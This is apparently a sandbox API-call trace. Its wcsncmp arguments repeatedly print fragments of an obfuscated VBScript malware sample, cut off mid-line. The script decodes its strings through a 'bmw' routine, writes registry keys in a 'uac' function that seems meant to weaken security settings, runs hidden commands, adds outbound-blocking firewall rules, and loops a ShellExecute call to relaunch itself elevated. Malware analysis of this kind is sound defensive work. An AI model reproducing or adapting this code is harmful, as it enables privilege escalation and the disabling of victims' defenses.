bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.379] wcsncmp (_String1=" = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.379] wcsncmp (_String1="= PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.379] wcsncmp (_String1=" PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.380] wcsncmp (_String1="PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.380] wcsncmp (_String1="ROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 